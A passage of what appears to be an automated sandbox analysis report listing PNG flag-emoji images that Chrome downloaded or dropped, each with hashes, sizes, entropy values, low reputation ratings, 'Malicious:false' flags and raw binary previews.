                                  SHA-512:E6D7B712A8C822D5C0DE781810E8B4A5A74F9624259D9506D53941AB2BFD98D2974B89DE78C95564081DD4EC4405414B2B17A471E6408F9B023C4D65BAD0B785
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.^E..m.]Tf.$.oTB.1..l.p..r.S.(.w..hokn..'/..l..?.lr.u.q....J..ltx...l.nsm..NSw.t...A..nsw...l..Bsv.w. .lr..A.v...ko..sv...ls..IMt........,..........................!../..$.....%..4.....%...."..$..$..(../.....#.."..6.....?..$.....;..&..I........;...M.."....(..P..!..3..Y..n..!...(..[.<.e.......Q...5.+......<........&.W....q..".........C......V.....|.......2..{..z.....`.....i..v.....E..t....4..C.c..p........k.y7.....d.m7.i_.ot....`;.hm.vf.\X...._f.T:.OVpt..}..Y`.SZ.CB.v.fk..HQ.5C.:7.>H.3@.1>]c../<.0<.'G.1A.;F.-9Y^..+7.*7.(6.*7.+7.'3.,7RX..&3.'2qZ..$1.,6.$0.$0.!..!.. ,IP..#...*.*3..).$0..(..(..&..&BH...%.&/..%<D.;C.>Cv:B.9A..!*..$8?.6>.5=.4<~..!3;~4;x2:|19{..&/7y...27k(3..5x&2.,4v-4p*2t)0r...(/p)/b&-n$+j!)eo..#)V &`.#V.#I..L..C..>........tRNS.....%178;ITV^cddqsy~...................................................................................................................................................!fu....jIDA
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5306
                                  Entropy (8bit):7.918471599808583
                                  Encrypted:false
                                  SSDEEP:96:xVYO0gY/IVFBrkSZ5cOCp/4M1dMw/v7IzxikkBOeN9NVuKpxA:xVYNAeSZ5cZp/4MQwcwBIck
                                  MD5:18CEC585FBA8C7158A6F9241F77EC265
                                  SHA1:55A4E7D5F197701873E180285BF1BAD2BF717FD6
                                  SHA-256:0519D4AA64F7819AF1FD17974C4C175EDC5CB616C5F8728503A5FF666E63507C
                                  SHA-512:00A08E05F22CE311D606F6DDD70245077FB34CF7C3E7AD20AFCE311AAD806073724A9C2FB426331C6BE059AFA65286FD7B0E3A15E48A97D1AE8697705F7FB18E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1f4.png
                                  Preview:.PNG........IHDR.....................PLTEGpL......tu...}su...{{h...8V}}}...{.4........-.S....j..wxx.........{{.Bp............sss.|....D-C......suv.xwa...........y e........uuu......?Lx.............................................................................................................................................................................................................................................p....r.......T.....tuh..W.....qw.hh.`^...^..B..M..}}}.GC.KK.TX.HH.B9F...LOxxx.Ue.EF/...A=.i..\ukq..BC1...9/sss.ABPx..a.%...??.??......$...716~.._..>>"......;;!...FQ.51.89 ~....Mo.....}..,$*w..44.67.22.z..x.xSvdZ..y..}."r..u..//.u..(#.s..56.w.~Kk.<K.,,.!..*+I\..p..s..))1b..m..h..15. ..&&^Mv.@[.m..i..$%.5C.h...0.e.._..b.."!.a..a.]A`.^.._..V..Y..((.Y.....Q..P.x%).J~....Bo.9d.}\.....tRNS....#"779<MT^ccccgfm.~~...................................................................................................................=.(0....IDATx....d.].......tM...$...e6
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5338
                                  Entropy (8bit):7.894749686253728
                                  Encrypted:false
                                  SSDEEP:96:vCbR7ei2MBjn2imGdMqhJCNu0UTJ4fjMaUJCNaMrMvQiHL1y+0mn72Q:vCdK6rFmGdMqhzD8waUXMQ1Zv2Q
                                  MD5:3EEB3B927F76C46157B9477DBB012561
                                  SHA1:C744E66E081CC4BD079DF4E738AEBB3A6F1E6BE6
                                  SHA-256:A7E11FAED942DEF47B92247DF145081D39100F0D46230023B901E7E66203FFC5
                                  SHA-512:B0B31DF69DBB845591528F4007B1EF29E2F4944A19140653319B9C33438BA4DBE406F909A307A3D7676145DDF5B37567C4C45F69FF416435180650AD3883585B
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLff.x....ey..hh.c.+ii..e...jj.w..x..gg.{....Vt........gg....{....[LLV|........ff.~..t....k...__.JJ.}..gg.__.....fYY...dd.5.J..W...[[..5NN......UU.CC.)(...Os.8..$...........!..............0.....;........%........5...........<...........;........Q..9.....Z.....b..=..g..?..t..Q.....k..8..}..L........`........_zz.vu.||qpp|hh.ii.hh{_^.``..&'.&&.&&.%$.$$.%.__..$$."".".VV..!!. .......!"WW....KM....LL...'...OO.. GGG.KK........$d...x1.AA.................$.==.88......!??....66..R........._$.77.00.........l...Y.....)).''.,*.k.....&&...>%%.A..$%.$$..%.!".""....!!.((. ..$......." .##.....................i...........U.. ........s.s........................7..........................>.............."..................................................................M....TtRNS.......',.;;FLQTY[[__`ffjllvww.............................................................5IDATx...y...}...s..\{.^^.....@..kP..J*.H.K]...?P..B*.H...E.D.......Jz.Z%J..i.` @e.....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3907
                                  Entropy (8bit):7.844271049362917
                                  Encrypted:false
                                  SSDEEP:96:JZClYrCj5cKU9CF33hrljn27uq6mU1bQ/kXIkiiQ95XySgN:J8+2j5nrHh9qMmU1bQrkK9dySi
                                  MD5:0163625DC285971BCE7C7410422CE1C3
                                  SHA1:7041234769524731835CECAA906E54F31E38406C
                                  SHA-256:3AA84C202F45344DD9CAE5EAD289D10654867413C3A481F65466E6F07845C5A6
                                  SHA-512:7105F7727A9C4908E19124068BB6F593BD8565F6A473D041BA6114A443676FDC11238A7798B81E1ED5C5522A683CE976E02DF23EE46C3B872512B7202B7B58E8
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1f2.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.^B.]T~I..V2|N..hh.gg|O..[[|O..k......w.....~.ii.PP{M..cc.V........._..q.,,rE..T..hh~Q..aaxJ..W..jjxJ.uG..aa.T..Y.zM..W..//.kk.]]uH............%..%.....$..$..$.."..... ..$...........$..........$...................<....................K...~..ii.~..|..}..cc.w..x..r<.YY.t..q&.__.t..ZZ.RR.q..p..[[.JJ.kE.n..l..KK.SS.@@.k..MM.dh.BB.OO.88.f..f..CC.HH.00.b..77.BB.`..**.&&.Y4.%".%%.&&.77.$..+-.$$.##.\..Z..!!.""....::.))....X....jO..V..... .#4oMt.U........'(....Q..........}N... ....!L.**.........mDHzJ................tF.."h......N<......................W6]...h"..........@..........E......&&.8!.%%....##."".8%i.#.E.. .....%.j.Ty.6.................................(................y...;.h...............................................}..q..c^O.C...xtRNS....$15@EU_cccccenp~~~~~~...............................................................................................-a....zIDATx....o.i^....y.zm..8..h...A;..q...9p..+...@.@
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6557
                                  Entropy (8bit):7.957510968572049
                                  Encrypted:false
                                  SSDEEP:192:qLQgtX7F2Qnr6OYXPtyVtrxIeEqp0xLz1QHVgvBa:OfEQrmMVZ8hQHVgvQ
                                  MD5:5D01763E9A83EABE2FC97056621BBA23
                                  SHA1:51A215D6873D1BBBC1AD9D182C2DF184DD7D5CF4
                                  SHA-256:281D853A1805B9F7F3960F61829537C8DB212EE97350A957CCF944F69FD3274E
                                  SHA-512:754D905BA1E67BE05B05AD1093B36999A4DB6435314F40B15A92D0A0CE16021C46CD7E8520794C0893C6E39F8C1CF35C31BF564DF8513DAF2F075C5A8DC027ED
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL+9b|..(7_w..&4]...'5]~..Yi.'6^......fhS8K~{..%4\x...{.&7ee..{..IY.&5]...v..(7^... /Wy..-;d...)8`v....VJ\..................$..#...........!.....$.."........ ....................:.......................8........".........Q...............p.........%..9.....f........}.....x.....s....J.s.x..s..m....j...f}.m|.Q..g{.`y.sww.a.yzUXv..z.^t.ct.Xs.Up.{}.Ro.Wn.Rm.[m..L)elpOj.t^.Hi.Og.Jg.ms.Ad.Qe.bedGc.Ib..K.sR|.IhB`..//kg.F^.9\.< .P.A\....AZ.BY.6X.;Y....TXY.7GAU.:U..%'.))6R.9R.-P.>Q..-..5..%&.*+3N.TCtYT.-L...#.##..&7L..!!9J|0K.HKJ....)'.......F....\5[.C.3Dt-D.......\@.........(!@.......j*G/@l@?B'Ax....../>et'&...&<v...,;d.........|..%8i[*!4:4......'5_....4h............I&".0[o..+/1....,T...X..u..((((+.%&&%$%i..:..c..!""."?....""S.....E..2...........#.....:#4....$tRNS...."/7DGUV`ccccgr~~~...............B..W...(IDATx....OSw..q...t..m..!..JCKKZ(....m(.rS.JE.)..2J..ckb...0.^0...osF.-Da..YF..D..1./.<...im......{h..7.<....................)7
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3693
                                  Entropy (8bit):7.7264340441203485
                                  Encrypted:false
                                  SSDEEP:48:hHkxdLifoN6Tdcuk4DCLTmAZ6UukdvImvpR8No0UD+udy62dLvrl+Mg8+ESxzUXT:Jkedhk4D26AZbdF8HudyNgMgGBZx
                                  MD5:18F36FFE8AD13F3393BEECC475F92740
                                  SHA1:A1831E9878B168333FDE2420A39D49BC44744101
                                  SHA-256:0F3958BEFEE9DA03F7AE920F3ADEC96CAD9AC5C87F384A739FE151AEF125E65F
                                  SHA-512:550EFFDD996125D61D27699761C8BA7C4CCEE1DB237B539894E7BE291646F0A197AAF6968C4BA4143D36C65218392424F2B609C32545A515597DF2CC9463B137
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1ed.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.__z...NN{...ff....gg...v...aa....ddz...ffy..x...gg...s...aat...ii.YY.>>....gg{...ddt......hh.00.AAr...jj....LL.[[v...ii...............t........s...gg.ZZ....aa....,,.gg........................................................................................................................~~.uu.oo.ff.\\.``.TT.YY.cc.[[.^^.WW.SS.DD.MM.HH.TT.JJ.NN.UU.BB.==.OO.77.EE.;;.11.44.--.FF.99.AA.((.,,.((.%%.%%.%%.##.44.##.88.**.$$."".!!.$$.......22.++.............!!....88.......!!..........##.)).......%%..................................................................................................................................................................................................................................................................|.....u..z.uM....tRNS.......!'-0>@FXZgl|}...............................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4376
                                  Entropy (8bit):7.883311280912297
                                  Encrypted:false
                                  SSDEEP:96:Qyp6stiAF/3qFCRZt56lcyQQbMOwMTGWIFlik+4HRozX:dZJF/RZgdZwIOin46zX
                                  MD5:169E9B640F35F58B07B84D8DF798D576
                                  SHA1:E25780EAC5D5702735B82ADC6CD0B2B68562DB4A
                                  SHA-256:13A95284DA99A4D86775BA3DB2FCF5B4876ED338434B11E8D2D6FF27C539419D
                                  SHA-512:8A067666F08648E732B7FF58BFB8C97F5BA7170599EE4C77429EBE1F736C0C030FA52D93E326C1030C56169156E0CC3DCDF18BD7AEA2AD40E6F5CA6585984AB6
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1e7.png
                                  Preview:.PNG........IHDR.....................PLTEGpLe`T^YN.{.{..Cknx..C^l..j"..?ao..{.j#..Ddr.]k..,^.{.i"..?*?p..:`o..'S..G`n..k#.{bq...><Kuft..k#_m..y..?.{ft..j#..@_m..z.j#ds...A.{.z.z]l..i"..=y..3Ep..L..J..I..H..G..G..F..F..F..E..E..?..E..=..>..E..E..>..E..D..7..D..C..6..D..C..B..K..F..5..?..@..B..O..=..B..>..R..>..X..B..>..B..=..\..P..B..<..b.?.[.@.e.<.@.x.j.r.=.l.;.:.9.6.9..5..5..0../..1../.~..w)gu..r*_n..l2.l#[j.Ue.wd0Qa.J^.K\.k[/AX.EW.cU.?S.=Q.=P~8P.YM,8L{5L.1L.0H~OF+*E."B.'B.(@{E>*.=.)<i.<..;..:..9z.9..8..7..7..6..5w.5..5.84'.4..3..3}.2..2}.1y.1v.1|.0p.0z.0..0|./s./x./../h./z..z0-&.-g.-y.-w.,v.,x.,].+j.+p.+v.*_.*u.*t.)[.)r)(&.(t.'l.'r.'s&&&.&].&o.&q.%o.%m.$H.$d.$p"##.$l.#n.#l."Q."l.!j.!k. #. b. j..\..V..j..g..i..h..#..a..F..P..\..#..N..S..A..!..K..G..D..=..!..9..!.. ........!.....tRNS........%%17:@KR]cdddlnq~~................................................................................................................j.F....=IDATx.....U..........A.P...l.)..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4865
                                  Entropy (8bit):7.912712696791235
                                  Encrypted:false
                                  SSDEEP:96:gLoUvMZdkWf7jiNk32pDpn2AuBAEeZzkzBk6lKaIBcbgyAGO7RslfHc:+VvsTiK32BJPzkzBk6ka/jO9GPc
                                  MD5:49DAD876BE13DE6BF3644677917DC079
                                  SHA1:B601FD50E5C36ED104EFEF512A9AFF53D02901CA
                                  SHA-256:B054401B855681CFBBB74A5BCD730589EF764004E893AEDE15838B5B3467BAB9
                                  SHA-512:6EB15AF695951A6500063437A079A5EBE58304FA1160F20CC143F9728D2D085D1C7F1B154C9DB8C10ED2C20330B449B2DD76C6B0F585D7E623B97DEAB86DC86E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1e6.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.<Cv...els...\dr...gnq..r...gn.<Dq...`gv....!....jqz..k..._ft.......(r...elr...<C.ip.U].ekr...jqp...`gs...kru.../8.fmm...\c.jq.fm.ah._g.Zb.T^.NX..$.W_.GR.QZ.HR#.%.@L.QY$.%.GR%.%.9F..#..$.KT.@L%.%.DN.8E%.$.%8.2@..#.&6$.%.EN. 6.7D.-;.@J.&6.#4"."./=.&6..".&6.&6.&5.(7..6.6B.%5.$4.%5..4.#3.#3.6@.#3.$3..".!1.!1.!1. 0.#2.*7#.%../..:../..3.#2....7@.....-..#.....,..4..,..,..*..+.!/.)4.&2..)..-..).."..(..(..'..,..3..&..(..&..%..%..%..$..*.}"..#..0..*..#..".u#.(2..!..!..'.. ..#..#..... ........,....k$..#..*$c%..2..........."...............'\%........(.....".&-.d"..............-..$.........'S%.........3K&Q;).......["..!..!...]2)........,t%,........................?='.......P#.......G$...`").........$@%}........D+(05&...x.........4!}..t........D.$n.....v..n.."$$h..5.3t...*tRNS.....%-8=KNUV[_ccehhvy~...................3`QA....IDATx....K.q......!..D$.e.X./...A......A..C..I%.Dp0<|.R............y...3.m...;.:......J~Y.m....?........h4..F..h4..F..nK...F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5488
                                  Entropy (8bit):7.9368331260259914
                                  Encrypted:false
                                  SSDEEP:96:bGP8PhaIgz2bJHlQb6+kWdBN41IoRw1668QD34fimjThWK4u7Jqf3Jt8RM:aFI7ab6TONhhcDQkfXtWKQ/yM
                                  MD5:76445DEE727C69677E1C0B4478D3E72C
                                  SHA1:A23B4B341BB45522FA836D33C45EF8582D6D5CBA
                                  SHA-256:310C205968CA1ACC8B2825199DFCE7EFCFBE66B46BF7D1493BF44E1F46C37F01
                                  SHA-512:9C99B7340208236105D899C3CD8657D92D4391EFD054FF658877A3D1443806ECFF58A1068F5F78D09F4B1FF85B07694992F6EB4AFC16EEFBEBCF9DBED0A31986
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..Tee...Q__...Ogg...R__......kii...O__...R...}..u....Tff.,,v..Nii...P^^...Qjj...Maa...P..Uii...P..J66}YY...............................................................||.||.vv.ss.oo.ii.jj.dd.__.aa.YY.TT.OO.HHjj..BBee..<<.;;``..55]]..44ZZ..//VV.TT..**.$..**.&&.#..%%QQ.OO..##.$'.!!.... II.JJ........#4....$=DD....DD..........CC.??........"J.......#W.........<<...-99.............r#i.........66..........33.55.......U%..................8..................--.......8$....w.G...**....((.--{...U.n...B..%%.$%.%%.......''.&&.$$.##."".....$....!!.%%~!!..$.......x.( .......................0.|...;.l.....w^.7...N.My..t................y..m...........f.....]9.V..}...*.i..p..W...........^.....r..{........e..V...........O..{..~..v..n..c..J..W..I.M....XtRNS....'49KUccegvx~~~~.....................................................................T.9.....IDATx..Y...y..:Km].L.&J.-.a.p..Nb'F. .A..,.r..........*W.r.......X.c.-.I....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 192 x 192, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3059
                                  Entropy (8bit):7.899443490831859
                                  Encrypted:false
                                  SSDEEP:48:rbX8MSh/sTJOb8c7FVXmwkbt0EUtCYKubFCBsIrmsHdWfBDga5J+njzAoVwj:H41s1bcDm3SDCfKEsvs9sBEiJ43AoVwj
                                  MD5:1A1650D2C76BFC1AC484646C19E495B9
                                  SHA1:FE58D66042CE9241226F5DA9370230285FF604FC
                                  SHA-256:6E587A62C9D7A97F25265AB5EB29D101AD2E36810042A4116D2DD29DA96B0BF8
                                  SHA-512:79C5C9278959BC94F66434779BEBC1B46C055655F0BC58AA375F179C227E7AC0E52DEA196764719D42AADCF98E4FD3B5A4488F2DB977EDDE430AA3DF733C03BC
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.............e..5...0PLTE.../../../..1..4..)..,.....1..4..6...........`..,n......tRNS..H.+..C...lIDATx..7..1..W U....*W...T......$.D..|....L.Z.....v.f...C$t..C.........g.jB7.3f..c.#w.M*..X...G.5y..sA..GG.^...Xz4......#P/C.}l4....OS.>.... ....I6...O._A.O.K.I..E....+..............V......]...^..6B..!M.'b.!.E.../C.W.&*q.g.S8.d.0...R..i.............3..8.CV.B...4.........x.~.........R...a....+H.I....`.`.(....,...Kn.&.... 3B;9.q.>H....o.X..~..>*B#..z..V...n.}...._..`..T1n.........I.(...g?.2n<.....qx.......?.t..>j.........M!.x~......me...k<....n.l-.b^.....6Xu..........@.;0.......m.J.:p%..!.....@wG|...GN...<.:..X.?..G..)....".r....n.a.....-.e..p...g.1.]... .......4....n.@..+..-XP..0...p.......l.V.1..&.[.LU.S..x!.)..e{|....t..>.....9h1=..60Z....E..b..K..X-.(...S.....K.&.o.[..v.x....5E....?.`Pm._.WY..-.jS.u....I>.. ..Q4..(.:T...3.3pbn|.....+./.Jb..Cp5Z...n.[.....b...g... ]L...Q...(.Mba.....4.....1?m.....uj...h..3..'........0 ..$.l
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4478
                                  Entropy (8bit):7.924484222122636
                                  Encrypted:false
                                  SSDEEP:96:+mEdKjSF07UOEMXgnQ85wr4k8JSpvTYtfOwci8QumiixAb:3Ek+F2ZEMX985wr4LAYIwZ8fmbAb
                                  MD5:DB611077DD14B74A80CC5E97A6D9841A
                                  SHA1:E02A9C706ACE39C86DCC255A67A6521AB7EC5647
                                  SHA-256:B6AA5D3440EC3299D373E1A194C4896C4CFA852A48E4903B42849D9710728C36
                                  SHA-512:6CB338A2D0A2D4F2E6053F5487F7A47150BD92CC27BE086EA90C332FFE6A3D34AC075A51E09E2AEEB64AB3EDB2474FA5EC4F6D1392FFB1EE29B223EDD3D6CE9A
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL]i..R'.......h;.)s5F...ZXe.ht.KY.gt.ap..H3.L'jv..L(.M:kw..J&.N).L(.F"jw..M)am.gs.an._k..O,.T/_k.]i..S/fr..T/.F"(7q.F"<I....%?.......$>...........|9.....>%.].z7...$.\.....C&.^.".!.Z.~;... :...?. ..-...."<....&&&$.\...............................'...G.%...S...%.^.4......Q..H.0..8..)..+....!.Y..K..V..T....6..2...O..C..........................%..R(..M.W2R_..s2..G.V'.b/an.Rb..&q.L&...Zh...........-...\.sAJ]..C..H"....l=.........,D.....w6.0.....l/6J..i;1H.........(A.gs.CW..^5..F7M.CT...}=R...G .S+@..d8#.X(<..S..o8....5.GX..h2.6.....,...N.)..^+..I....3.(?...N.w@.+}....Z0..h>N...s..L'''.zE...kw..{?...... }J...\[[...444%5x........#...`..DCC.....y[o....I.w......www===...s.....+++OOO.......4.hm..0._...IHH......G.m...........ajd....._.~...ppp...f.w...|.$oDw.<....)tRNS..}c~cc.~.a.<..%.gO.9....r..(......k..f....IDATx....K.{....9.O...n....p.~..".A.tT..D...n*(....T....T.!.*..B.."H!.]......m..uNt.........g>Z....ygAe......=...................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5388
                                  Entropy (8bit):7.843196658923243
                                  Encrypted:false
                                  SSDEEP:96:Q3TU13f3amXwlj+B9xsu0Y0yh+c38RP1pXzYQ/C7rDXKWiz7JivvQqimEV:2U1i89xZ0KaNpjxC7XuYvPve
                                  MD5:D05F1F3AD89492CECEFF7AC3A6A532C5
                                  SHA1:3FEF5F5823CD4962FB1174625A3AE0BB6BB96EAF
                                  SHA-256:903F02524810DEFAF467255F8865ED46233BD03FFA7ACCCEF25E1B8AEF13DD75
                                  SHA-512:5CCBBEBBC6CA2ECD4A477580E255642D48E48F3C93F4AC2FFA5DC908E33E74507A5D7DB4ED2310400C9C225ECFBC087A00CFAB5252CA7DB6A853D93C14D1EAAB
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLu..t..z................(.i!.w .T$..........G!.5$..)..$..$....8D.5C.AN.KV.P_.[f.gp.mu.ai.V`.MZ.FT.>M.7G.2C."C..F.1D.7E.+E.$F.T>.C3..3.7.=.w=.FA.b?.=.:.8.;..8..7..5..5..6..8..8..7..6..6..5..4..2..0../..-..-..+..*..(..'..$..". ................"...`.=.e_-zK.kc.qh5.X..:.....)..........4B.W.vq.}n..E..v.|w`._..|C.i..N..z..~&.v#.s .p..n..m..j..h.~g.}f.{d.zc.ya.v_.u^.s].qZ.nX.mV.lU.kT.jT.iR.hQ.gP.fO.eN.[X.`YI.?..2.fO..).. 6.p..zJwk.*@qp@m.@..C..S..%.."..5..-..+..4..5._.sw.nu.nv.ls.qy.qy.px.jq.em.Zc.ai.fm.hpp.".8D..:.CM.dl.fo.OW.S[.KT.@M.1=.'3."7..<.+=.0@.+:.*7.(4.$1..).#.{.'q.#n..g..`..g..e..f..f..g..g..e..h..j..h..a.._..n."sI#.[..L%.v...... .).X..I..G..2..2..2..-..(..".".'.#.'.p9.c/..2..0..+..(..$..".. ...p/0.pU.rZ.mX.%2..,.!0.!0."0.!...*..,........tRNS.~................................................................................................................................................................^9........y.gU#
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3309
                                  Entropy (8bit):7.863203781557119
                                  Encrypted:false
                                  SSDEEP:96:1TthWtQOG3ijNzFiC/ojVABl50yJ+ZRUoaJTM:9aeV3AFIVAj6yJMRUNu
                                  MD5:786328BF9F2F9FC14A2C0CCB25126650
                                  SHA1:1EE05BE95DBFF871D0B4E4C7872E7ADCF4486563
                                  SHA-256:CAF57C21BFDD97D2F9B62B862170EB2D0D11282303A4E96E89DB6B3CC340D184
                                  SHA-512:117CF049BBC00A0683A2D05A55C55CB81B2B4B5A06FB7476270CB9A32DD5EFE8EEE0AD9F122F87CD4AE8140B8B2FB3F9C14B7A9DEF27B07562901375C58EBED2
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLzaL.u=.*ket.oZX.!.l\;.-.u.j^.ubs..u.n7b....>Zk..f[. ,.u..=.n.g.._p..go..H.hpar..ua...p.<Nu..?ev..u.elcs...?.t.uh....?.o.cs..iq..?c...t..?bs..p..bj..9a...tu.Er..4..8..8..8..7..7..)..8..6..3..7..(..5..7..6..4..6..5..6..3..<..6..(..2..E..5..2..4..3..0..5..M..0..@..1..1..;..T..1..H..0..X..3..^..2..1.b.G.r.0.l.d...j.,.*..(..'..%..".kr..!.fm.ck.`i.}..Ybfv..x..Yb.t..LX.E?.R\^o..D=.q..o..LV.AOWi.}k..DOPd..6F.?J.7C.,=.):E\..)9.2?.9D.&7.%6.*9.%6..?BW..$4.5@."3.!2.)7..0.%4."1;R.5R.../.....5..0.!0..,..-.!0..+..*0M}..(..*.!...&..'.!-..%..))H...%..#..#..!..!..*.. ..*..... .....$ A....#>r.>...#.=.~.%....;..;~.:..9~...u.!.8~.7}.6|....5s.5..5{.4c.4.....4y.3..3y.2w.1rj...1wy...0v./uq....t..r.-j.,r.+p.*o.)_.(ma...'l.&k.%i.$R.$f."Y.!a. G. \..S..B..K..G..='.......tRNS.......%14699EFILWZcddmlns~................................................................................................................q.nN....IDATx...j.F......F.e.6.@.y..p.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3917
                                  Entropy (8bit):7.901117391506987
                                  Encrypted:false
                                  SSDEEP:96:sU5ZTCGS0PmSRhdWLXcOhXE3eMp7YdYq1ZH+LZgKRQ7suulG6W4ehL:L5Z2GOSRhdEsOlEeMKWqL+LkFu2L
                                  MD5:BD7698AEB0A03008D4B3464618715677
                                  SHA1:C7618C44B6B469751FD82A6C23EED566FB872B40
                                  SHA-256:30DA17B907747EA168E0EB990F3D06AE5E07324BB739E6CA38626263ADD8D727
                                  SHA-512:627AC8F2F2D501ADD611B221B48D383D29DCF4B7ED47B132094C39E3F53299B4C9108D07283E682C209141DF9396C44CC937B07888813687C7B8DD11354107E9
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1ec.png
                                  Preview:.PNG........IHDR.....................PLTEGpLi........j.....j.....h...........lT.*.j.....e.....<m_.U?w...........j.....j........g.....k........p".g.....c..q"................................................................................................................................................................................................o..~..W.....f.....D..F..2.....&.....%..C.{$..1.|".."..!.~I.p`.h..|*.z{t[..{.....y.eN.E5..w..}..x.D4.D4..v..r.8+.XD.=..N<..u.C3.B2..tG.b..t..s.@0.A1..r.?/..p.@0.=-..r.2$..n$.h..p.;+igN.>/..m.9).3$..k..k..i..l.7(.:,.6&..i..g..f.4$..e..h.M7.9+.(...e.2"..d..c.0 ..a.1":kN.6).....`.w].?,.,...^.+..,..~].. .~\.*..0". ..}\.3&.zY9aFiL4.'.OV>.'..mV.kU.%..+...".'..tUz>*.#..!..."....!..$..mP.......*..#..%.....(..cJ...~'....*L6. .z#..XAs#.....U>...y..o..{..i..p..c..~.|....atRNS.....%27HNbbcbgpx~~~~...............................................................................Y....IDATx..K.$.u.........1x0^..@.62h.2.?........W.o.6....xa0...4HH......
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4893
                                  Entropy (8bit):7.914495300335713
                                  Encrypted:false
                                  SSDEEP:96:gpJuwUPF/jaxbVye4RsfLI2zBV+wYaD66cbshyeKllGYay0O:F60e487BV+wYaFcbey1WYOO
                                  MD5:FED181690A39D4FB8FDFA30BD299B927
                                  SHA1:E5B8872A26C6F9C3B3AB47CC387E01C719A61F0D
                                  SHA-256:0404313239CA9E4D5033C6D551FBB4BC373F47459CA264E7089D4ADFFE72462C
                                  SHA-512:D58249D6B72262075D7A0CDD7B24C898C71F1D1C7D3FB2A9949F1B3B77DB62BBB36B9E67BB5503125295C1A3859D5D39F390EE5CDBA2A3522F28205265BEF882
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLf........g........g.....f.......E[...*.7xf.....q.......`...g.....g........f........g........i........h.....`.........................................................................................................................................................................................................................y....t.....oz.cok...XeZy..JW.AOKl../7.1>.4D.3D.3D.1B.;X.2B.(0./@.0A..>.):5`..=h.+<.,<..>.(9dH..+;.&6.!3y?x.#4..$ML.8S..!2.)8.!2&V.&U...,$S.../.!1.Y.....'5!Q.'O...+.!0.O...,.U...$.)QY9{..).M.7D.. ...#.K...(."/..&#G..I...%.....(. 0..#.L..F...!..+..!..#....E.J0q....B...&....@..>..?....|.'.?.n.I.=.V$X.;..."....;..9..;..:.q.$x.!.,v.7..6w?$e....7..5..4..4.l...3..2..1..1.z.../../.r...+..,.f...,r.&..){`...&q....!d. `..R..i/.GG...ltRNS.....%76LLZbcbdgh}~~...............................................................................................`IDATx..[.\.Y..k.}..9.....uN...ik.I.(......R...T".....T...Dx.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 50 x 50, 8-bit/color RGB, non-interlaced
                                  Category:downloaded
                                  Size (bytes):1920
                                  Entropy (8bit):7.864950750930725
                                  Encrypted:false
